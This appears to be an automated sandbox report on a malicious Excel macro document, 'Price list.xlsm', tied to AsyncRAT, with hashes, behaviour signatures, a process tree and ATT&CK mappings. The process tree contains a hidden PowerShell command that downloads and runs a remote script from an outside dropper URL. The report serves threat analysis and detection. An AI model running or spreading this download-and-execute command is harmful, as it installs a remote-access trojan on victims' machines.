Analysis

  • max time kernel
    123s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    04-05-2021 15:01

General

  • Target

    Price list.xlsm

  • Size

    64KB

  • MD5

    dc48640ca8488d4c4e61b807ef19d11c

  • SHA1

    e2cfbc565e62b269a7bfbdf2b3c060e52aaa6614

  • SHA256

    c8f3d97c54386b86778a1d20917353583bcf706ffe0615d962683d55e449bcab

  • SHA512

    06d0b3420f784cad69e11202271b99f47c7c5eeca68de9a5e01da6ebf2c5b25414ec242dd4517eeff43fcd239ec8ded073a9317c1140ae9e3c6b620b6af741b9

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://cenga.hr/components/search/pri.ps1

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Price list.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:852
    • C:\Users\Admin\AppData\Local\Temp\HsJzA.exe
      C:\Users\Admin\AppData\Local\Temp\HsJzA.exe
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3980
      • C:\Windows\SYSTEM32\cmd.exe
        "cmd"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2208
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('https://cenga.hr/components/search/pri.ps1'))"
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:416

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\HsJzA.exe
    MD5

    c8f1a39398783633b0fdcf9c744001ee

    SHA1

    db1ac98baa818def3931ccce9bd63434cf81587d

    SHA256

    d506b695f45cb729a6af2e18708597fe2f7df623d4f36e1ab1a4f118dbbdccf9

    SHA512

    d4d3c235e7224de8378b21b43f713df904903c7c01fda8ba4110469c8f9e766ea44b0ffda8ea47ec97fbc383db51f969e0fcfed7d0e0de194b891b928855c60b

  • C:\Users\Admin\AppData\Local\Temp\HsJzA.exe
    MD5

    c8f1a39398783633b0fdcf9c744001ee

    SHA1

    db1ac98baa818def3931ccce9bd63434cf81587d

    SHA256

    d506b695f45cb729a6af2e18708597fe2f7df623d4f36e1ab1a4f118dbbdccf9

    SHA512

    d4d3c235e7224de8378b21b43f713df904903c7c01fda8ba4110469c8f9e766ea44b0ffda8ea47ec97fbc383db51f969e0fcfed7d0e0de194b891b928855c60b

  • memory/416-185-0x0000000000000000-mapping.dmp
  • memory/416-186-0x000001D0F8B60000-0x000001D0F8B62000-memory.dmp
    Filesize

    8KB

  • memory/416-187-0x000001D0F8B63000-0x000001D0F8B65000-memory.dmp
    Filesize

    8KB

  • memory/416-188-0x000001D0F8B66000-0x000001D0F8B68000-memory.dmp
    Filesize

    8KB

  • memory/852-117-0x00007FFD2ADC0000-0x00007FFD2ADD0000-memory.dmp
    Filesize

    64KB

  • memory/852-123-0x00007FFD497C0000-0x00007FFD4B6B5000-memory.dmp
    Filesize

    31.0MB

  • memory/852-114-0x00007FF629660000-0x00007FF62CC16000-memory.dmp
    Filesize

    53.7MB

  • memory/852-122-0x00007FFD4B6C0000-0x00007FFD4C7AE000-memory.dmp
    Filesize

    16.9MB

  • memory/852-121-0x00007FFD2ADC0000-0x00007FFD2ADD0000-memory.dmp
    Filesize

    64KB

  • memory/852-118-0x00007FFD2ADC0000-0x00007FFD2ADD0000-memory.dmp
    Filesize

    64KB

  • memory/852-116-0x00007FFD2ADC0000-0x00007FFD2ADD0000-memory.dmp
    Filesize

    64KB

  • memory/852-115-0x00007FFD2ADC0000-0x00007FFD2ADD0000-memory.dmp
    Filesize

    64KB

  • memory/2208-184-0x0000000000000000-mapping.dmp
  • memory/3980-179-0x0000000000000000-mapping.dmp
  • memory/3980-183-0x000000001B023000-0x000000001B025000-memory.dmp
    Filesize

    8KB

  • memory/3980-182-0x000000001B020000-0x000000001B022000-memory.dmp
    Filesize

    8KB